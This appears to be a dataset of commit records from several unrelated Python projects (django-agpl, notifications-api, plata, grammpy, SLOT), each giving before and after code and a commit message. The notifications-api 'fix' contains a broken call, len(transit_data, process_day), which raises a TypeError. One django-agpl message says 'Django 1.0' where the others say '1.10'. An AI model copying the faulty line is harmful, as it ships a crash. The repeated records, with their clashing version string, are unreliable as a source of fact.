# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
<commit_msg>Drop patterns import for Django 1.10 compatibility.<commit_after>
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
Drop patterns import for Django 1.10 compatibility.# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
<commit_before># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
<commit_msg>Drop patterns import for Django 1.0 compatibility.<commit_after># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
99d1357c379b2df5219891da7f64e4584060f069
|
app/celery/reporting_tasks.py
|
app/celery/reporting_tasks.py
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
Fix the logging message in the nightly task
|
Fix the logging message in the nightly task
|
Python
|
mit
|
alphagov/notifications-api,alphagov/notifications-api
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
Fix the logging message in the nightly task
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
<commit_before>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
<commit_msg>Fix the logging message in the nightly task<commit_after>
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
Fix the logging message in the nightly taskfrom datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
<commit_before>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
<commit_msg>Fix the logging message in the nightly task<commit_after>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
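Note that the committed log line originally read `.format(len(transit_data, process_day))`, which raises `TypeError: len() takes exactly one argument (2 given)` the first time the task completes; the corrected call above passes each value to `str.format()` separately. A standalone sketch of the fixed argument placement, using stand-in values in place of the real billing rows and date:

# Stand-ins for the fetched billing rows and the day being processed.
transit_data = ["row1", "row2"]
process_day = "2018-01-31"

# len() receives exactly one argument; format() receives two values.
msg = "create-nightly-billing task complete. {} rows updated for day: {}".format(
    len(transit_data), process_day)
print(msg)  # create-nightly-billing task complete. 2 rows updated for day: 2018-01-31
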
987c54559cb52370fc459a30cdbdfd0e38c5ef62
|
plata/context_processors.py
|
plata/context_processors.py
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
Add the variable `plata.price_includes_tax` to the template context
|
Add the variable `plata.price_includes_tax` to the template context
|
Python
|
bsd-3-clause
|
armicron/plata,armicron/plata,stefanklug/plata,armicron/plata
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
Add the variable `plata.price_includes_tax` to the template context
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
<commit_before>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
<commit_msg>Add the variable `plata.price_includes_tax` to the template context<commit_after>
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
Add the variable `plata.price_includes_tax` to the template contextimport plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
<commit_before>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
<commit_msg>Add the variable `plata.price_includes_tax` to the template context<commit_after>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
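The record above follows Django's context-processor contract: any callable that takes the request and returns a dict can be registered under `context_processors` in the TEMPLATES setting, and its keys become template variables on every render. A generic standalone sketch of that contract (names and values are illustrative and not part of plata):

def site_context(request):
    # Returning {} is the conventional "nothing to add" case,
    # mirroring the early return above when no shop instance exists.
    if request is None:
        return {}
    return {
        'site': {
            'name': 'Example Shop',              # hypothetical value
            'path': getattr(request, 'path', '/'),
        },
    }

class FakeRequest(object):
    path = '/checkout/'

print(site_context(FakeRequest()))  # {'site': {'name': 'Example Shop', 'path': '/checkout/'}}
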
ae4b4fe5fb5c5774720dd3a14549aa88bde91043
|
tests/Epsilon_tests/ImportTest.py
|
tests/Epsilon_tests/ImportTest.py
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
Add tests to compare epsilon with other objects
|
Add tests to compare epsilon with other objects
|
Python
|
mit
|
PatrikValkovic/grammpy
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
Add tests to compare epsilon with other objects
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
<commit_msg>Add tests to compare epsilon with other objects<commit_after>
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
Add tests to compare epsilon with other objects#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
<commit_msg>Add tests to compare epsilon with other objects<commit_after>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
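The tests above exercise a common property of module-level sentinels: two import paths bind the same object, so identity and self-equality hold while comparisons against unrelated values fail. A standalone sketch of the same test pattern with a generic sentinel (names are illustrative, not grammpy's):

from unittest import TestCase, main

SENTINEL = object()
ALIAS = SENTINEL  # a second import name bound to the same object

class SentinelTest(TestCase):
    def test_identity(self):
        self.assertIs(ALIAS, SENTINEL)           # same object, same id()

    def test_not_equal_to_other_values(self):
        self.assertNotEqual(SENTINEL, 5)
        self.assertNotEqual(SENTINEL, "asdf")
        self.assertNotEqual(SENTINEL, object())  # a fresh object differs

if __name__ == '__main__':
    main()
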
86692e6fbbbc6a8db9e4c323eb0688865b81f717
|
slot/main.py
|
slot/main.py
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
Add SSLify to force SSL
|
Add SSLify to force SSL
|
Python
|
mit
|
nhshd-slot/SLOT,nhshd-slot/SLOT,nhshd-slot/SLOT
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
Add SSLify to force SSL
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
<commit_before>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
<commit_msg>Add SSLify to force SSL<commit_after>
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
